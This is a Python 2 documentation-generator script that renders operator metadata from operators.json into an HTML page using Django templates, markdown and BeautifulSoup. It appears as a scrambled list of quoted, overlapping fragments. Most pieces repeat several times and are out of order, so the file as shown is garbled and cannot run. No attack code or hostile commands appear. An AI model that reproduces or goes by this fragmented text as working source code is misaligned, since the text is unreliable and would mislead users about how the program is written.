"operators and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0]",
"{{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '{% if attrs|length_is:\"0\"",
"input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate",
"docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API",
"'<td class=\"field-body\"><ul class=\"first simple\">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if",
"removes faulty characters, recursively. \"\"\" try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid",
"destination_dir): try: # Open the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api",
"the operators and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output +=",
"% operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to build operator docs",
"class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name",
"attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>)",
"'<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col",
"print 'Failed to build operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try:",
"{% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + (",
"import re import codecs from bs4 import BeautifulSoup from django.template import Template, Context",
"input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>')",
"if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>)",
"= clean_json_string(raw_operators_api) # Go through all the operators and construct a new HTML",
"%}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for",
"operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang)",
"operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir,",
"BeautifulSoup from django.template import Template, Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS",
"( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for input in inputs",
"destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) # Go through all",
"attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}') + ( '</tbody>') +",
"ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)', str(e)).group('column')) return",
"Exception('operators.json does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e:",
"id=\"{{ type }}\">' + ( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe",
"'Failed to build operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: #",
"endif %}') + ( '</tbody>') + ( '</table></dd>') + ( '</dl>') + (",
"'<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils",
"for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>)",
"operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator docs because: ', e",
"not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir)",
"operators_output += OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator: formula_map =",
"len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment +",
"'</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment",
"and removes faulty characters, recursively. \"\"\" try: return json.loads(body) except ValueError, e: if",
"as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print",
"comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup",
"build operator docs because: ', e def clean_json_string(body): \"\"\" Takes in a string",
"build operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = ''",
"= OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in",
"= raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed to build",
"operators: if 'comment' in operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True)",
"from django.template import Template, Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE",
"if 'comment' in operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment",
"print 'Saving operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path,",
"Open the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api,",
"output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate",
"import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type",
"<gh_stars>10-100 import json import os import re import codecs from bs4 import BeautifulSoup",
"%}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if",
"comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output",
"be interpreted as a JSON object, and removes faulty characters, recursively. \"\"\" try:",
"comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0:",
"in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif",
"comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string =",
"e: print 'Failed to build operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir):",
"lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) # Go through all the",
"class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs",
"class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for",
"for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' )",
"{{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}') + ( '</tbody>')",
"import BeautifulSoup from django.template import Template, Context import markdown from deploy.utils import reserve_formulas,",
"( '</tr>') + ( '{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>')",
"def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) # Go",
"endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{%",
"= BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in",
"+ ( '<td class=\"field-body\"><ul class=\"first simple\">{% for output in outputs %}<li><strong>{{ output.name }}</strong>",
"( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table",
"in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {%",
"attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{",
"e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)', str(e)).group('column')) return clean_json_string(",
"try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not",
"}}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '{% if attrs|length_is:\"0\" %}{% else",
"#if len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment",
"+ ( '</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div",
"output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {%",
"if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>)",
"comment: soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for",
"{% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment",
"(<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{%",
"= unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output +=",
"Template, Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\"",
"endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE",
"e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API file. with open(operators_api_path)",
"except Exception, e: print 'Failed to build operator docs because: ', e def",
"+ ( '<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul",
"}}\">' + ( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') +",
"OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if",
"e: print 'Failed to build operator docs because: ', e def clean_json_string(body): \"\"\"",
"operator in operators: if 'comment' in operator: formula_map = {} comment = reserve_formulas(operator['comment'],",
"django.template import Template, Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE =",
"['en/html', 'cn/html']) except Exception, e: print 'Failed to build operator docs because: ',",
"'Failed to build operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output",
"import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{",
"endfor %}</ul></td>') + ( '</tr>') + ( '{% if attrs|length_is:\"0\" %}{% else %}<tr",
"deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">' + (",
"output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') +",
"'comment' in operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment =",
"% operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output)",
"operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS)",
"print 'Failed to build operator docs because: ', e def clean_json_string(body): \"\"\" Takes",
"formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in",
"operators = clean_json_string(raw_operators_api) # Go through all the operators and construct a new",
"+ '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')]",
"class=\"field-body\"><ul class=\"first simple\">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable",
"to build operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open",
"+ ( '<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody",
"operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in",
"= comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path",
"raise Exception('operators.json does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception,",
"( '</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{%",
"construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator",
"a JSON object, and removes faulty characters, recursively. \"\"\" try: return json.loads(body) except",
"= '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not",
"else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr",
"= Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator:",
"%}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in",
"valign=\"top\">') + ( '<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') + ( '<td",
"class=\"first simple\">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable ==",
"object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators: if 'comment'",
"'<td class=\"field-body\"><ul class=\"first simple\">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if",
"+ ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>')",
"does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print",
"in comment: soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation')",
"equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment']",
"class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated ==",
"= markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup =",
"'<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for output in",
"( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){%",
"attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>')",
"str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for",
"%}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '<tr class=\"field-even",
"if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path,",
"formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if",
"%} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{%",
"try: operators = clean_json_string(raw_operators_api) # Go through all the operators and construct a",
"class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for output in outputs",
"codecs from bs4 import BeautifulSoup from django.template import Template, Context import markdown from",
"= formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output +=",
"generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to build operator docs because: ',",
"markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>'",
"simple\">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1",
"%}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}') + (",
"== 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + (",
"e def clean_json_string(body): \"\"\" Takes in a string meant to be interpreted as",
"== 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif",
"in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to build",
"%}</ul></td>') + ( '</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>') +",
"+ ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for",
"class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for output in outputs %}<li><strong>{{ output.name",
"operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except",
"= '<div class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{ type }}</h2>') + (",
"( '<td class=\"field-body\"><ul class=\"first simple\">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {%",
"= '' try: operators = clean_json_string(raw_operators_api) # Go through all the operators and",
"+ ( '<td class=\"field-body\"><ul class=\"first simple\">{% for input in inputs %}<li><strong>{{ input.name }}</strong>",
"'</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>'",
"{% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}')",
"== 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + (",
"generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json",
"comment|safe }}') + ( '<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') +",
"with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception,",
"OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{ type }}</h2>') +",
"class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>')",
"if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first",
"because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators =",
"# Open the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read()",
"'</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim",
"(destination_dir, lang) print 'Saving operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path))",
"OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s'",
"field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{",
"operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to build operator docs because:",
"> 0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment + '</p>',",
"operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html',",
"1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>')",
"operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s' % operators_output_path",
"'<div class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{ type }}</h2>') + ( '<dl",
"API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html'])",
"in operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment,",
"reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{ type",
"except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)', str(e)).group('column'))",
"operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs:",
"'<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for input in inputs %}<li><strong>{{",
"input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {%",
"clean_json_string(raw_operators_api) # Go through all the operators and construct a new HTML object.",
"in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s'",
"+ comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string",
"class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{",
"output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {%",
"raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed to build operator",
"soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation",
"os import re import codecs from bs4 import BeautifulSoup from django.template import Template,",
"a string meant to be interpreted as a JSON object, and removes faulty",
"id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path",
"'<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">') +",
"clean_json_string(body): \"\"\" Takes in a string meant to be interpreted as a JSON",
"( '<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">')",
"= '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s' % operators_output_path if",
"', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api)",
"( '<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils field-list\">') + ( '<colgroup><col",
"1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + (",
"in operators: if 'comment' in operator: formula_map = {} comment = reserve_formulas(operator['comment'], formula_map,",
"( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for output",
"input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') +",
"unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1]",
"'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment =",
"%}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{",
"%}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name):",
"'%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s' % operators_output_path if not",
"json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)',",
"( '</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\"",
"endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '{%",
"Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{",
"}}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}') + ( '</tbody>') + (",
"% (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s' %",
"'<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if",
"OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving",
"%}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if",
"only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in comment:",
"+ ( '{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + (",
"'<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json'",
"( '</tbody>') + ( '</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER =",
"+ ( '</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div",
"= reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if",
"field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for output in outputs %}<li><strong>{{",
"comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path =",
"1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}:",
") OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir)",
"class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + (",
"interpreted as a JSON object, and removes faulty characters, recursively. \"\"\" try: return",
"{% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment",
"to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as",
"endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{%",
"%}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor",
"raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed to",
"'</tr>') + ( '{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') +",
"1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}:",
"HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators: if",
